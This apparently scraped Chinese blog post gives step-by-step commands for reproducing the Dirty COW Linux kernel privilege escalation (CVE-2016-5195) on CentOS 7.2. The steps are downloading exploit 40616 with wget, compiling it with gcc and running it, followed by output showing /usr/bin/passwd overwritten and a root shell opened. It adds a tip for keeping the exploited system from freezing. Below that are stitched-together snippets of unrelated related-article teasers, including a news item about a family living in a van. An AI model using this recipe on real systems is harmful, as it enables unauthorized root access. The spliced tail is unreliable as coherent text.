关于脏牛

测试平台:CentOS7.2

编译工具GCC

mkdir cowroot

cd cowroot 
wget https://www.exploit-db.com/download/40616

mv 40616 cowroot.c
gcc cowroot.c -o cowroot -pthread

这时会发现GCC编译器有警告,不要管,当前目录下已经编译完成cowwroot文件了
执行cowroot

./cowroot

  • 执行

DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 57048
Racing, this may take a while..
/usr/bin/passwd is overwritten
Popping root shell.
Don‘t forget to restore /tmp/bak
thread stopped
thread stopped

会发现用户已经变为root

但这里有一个问题,在执行EXP之后十几秒后,系统会卡死,在kali2.0(debian)  CentOS7.2 
ubuntu14.04测试都卡死
这样就算到时候利用这个漏洞提权成功,卡死后也没用了,只能重新登陆

方法是关闭pdfflush刷新,防止死机

时间: 2024-10-29 19:12:03

关于脏牛的相关文章

脏牛Linux本地提权漏洞复现(CVE-2016-5195)

学习该漏洞的原因: 总是看到圈子里一位老哥发文章使用这个漏洞来提权,进过测试发现centos比较难提取,而Ubuntu是比较好提权的. 漏洞范围: Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复) 危害: 低权限用户利用该漏洞可以在众多Linux系统上实现本地提权 简要分析: 该漏洞具体为,get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空

Linux提权:从入门到放弃

日站就要日个彻底.往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面.Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置.一下是我总结的一些提权方法. 几点前提 已经拿到低权shell 被入侵的机器上面有nc,python,perl等linux非常常见的工具 有权限上传文件和下载文件 内核漏洞提权 提到脏牛,运维流下两行眼泪,我们留下两行鼻血.内核漏洞是我们几乎最先想到的提权方法.通杀的内核漏洞是十分少见的,因而我们应该先对系统相关

ElastichSearch漏洞

Ubuntu服务器被黑经历(ElastichSearch漏洞) 起因 最近我们的一台Ubuntu阿里云服务器一直提示有肉鸡行为,提示了好几天,开始并没有关注,然后连续几天后发现应该是个大问题啊.很可能服务被侵入了!!! 寻找线索 一开始我是完全懵逼的状态的,Linux不是很熟悉,只会简单的命令,安装部署redis,mongo这些东西.好吧,只能百度Google了! 寻找可疑进程 ps -ef然而结果看起来一点头绪都没,非常不熟悉Linux底下常见的进程! 寻找相关的Log线索 Linux里有非常

工具科普贴

工具新手科普(建议大家收藏这个帖子) 简介整理来自于而本人另一个平台分享,摘录于此. 给我回复支持的我就继续更新内容哦! 刚入门的汉子,一直以来或许在收集有用的文章,有用的圈子,不但得不到大牛的回应,更多就是碰壁,别人厉害点吧,懒得理你,人之本性,扶强不扶弱,以后会贡献出大批量好文章,希望给那些进不去圈子,挤不进去的人,一个自我重塑的机会,给圈子贡献一份微薄的力量,文章工具纯是收集,今天偶然发现微信公众号上自己还收集过还有一篇这个样子的文章,特意分享出来出来,格式忽略,看干货就是. 介绍没有利益

安全从业人员常用工具指引-freebuf

入门指南 https://wizardforcel.gitbooks.io/web-hacking-101/content/ Web Hacking 101 中文版 https://wizardforcel.gitbooks.io/asani/content/ 浅入浅出Android安全 中文版 https://wizardforcel.gitbooks.io/lpad/content/ Android 渗透测试学习手册 中文版 https://wizardforcel.gitbooks.io/

第十章 Centos7-系统进程管理

第十章  Centos7-系统进程管理 本节所讲内容: 10.1  进程概述和ps查看进程工具 10.2  uptime查看系统负载-top动态管理进程 10.3  前后台进程切换- nice进程优先级-实战screen后台执行命令 10.1  进程概述和ps管理进程 10.1.1  什么是进程? 进程是已启动的可执行程序的运行实例,进程有以下组成部分:  ? 已分配内存的地址空间:  ? 安全属性,包括所有权凭据和特权:  ? 程序代码的一个或多个执行线程:  ? 进程状态 程序: 二进制文件

kali权限提升之本地提权

系统账号之间权限隔离 操作系统的安全基础 用户空间 内核空间 系统账号: 用户账号登陆时候获取权限令牌 服务账号无需用户登录已在后台启动服务 windows用户全权限划分: Users:普通用户组,Users 组是最安全的组,因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料 Administrators:管理员组,默认情况下,Administrators中的用户对计算机/域有不受限制的完全访问权.分配给该组的默认权限允许对整个系统进行完全控制 System:拥有和Administr

任务1:Linux Kernel提权(50分)[2019年信息安全管理与评估赛题答案 -01]

任务环境说明: 攻击机: 物理机:Windows7 物理机安装工具1:Microsoft Visual Studio 2008 物理机安装工具2:OllyICE 虚拟机1:Ubuntu_Linux 虚拟机1安装工具1:Python3/Python2 虚拟机1安装工具2:GCC 虚拟机1安装工具3:GDB 虚拟机1安装工具4:Netcat 虚拟机1用户名:root,虚拟机1密码:123456 虚拟机操作系统2:CentOS_Linux 虚拟机2安装工具1:GCC 虚拟机2安装工具2:GDB 虚拟机

生活娱乐 冯增最牛的房车

[写真]家在"最牛房车"上 冯增不抽烟,却爱喝几口小酒,每天干完活,媳妇会在旁边的小超市买一瓶啤酒,一家人一起吃顿简单的晚饭.冯增也是在这个时候才真正感到家的温暖. 豫G33425是冯增这家的"门牌"号码. 蜗居在中巴车上休息不好,每到中午冯增就会躺在旁边修车铺打个盹. 中巴车"楼层"不高,冯增旁边是媳妇给他捡回来的老板椅. 胡国庆(西安) 摄影报道 打工23年仍望房兴叹,冯增只好将五口之家安在一部即将报废的中巴车上--"史上最牛房车&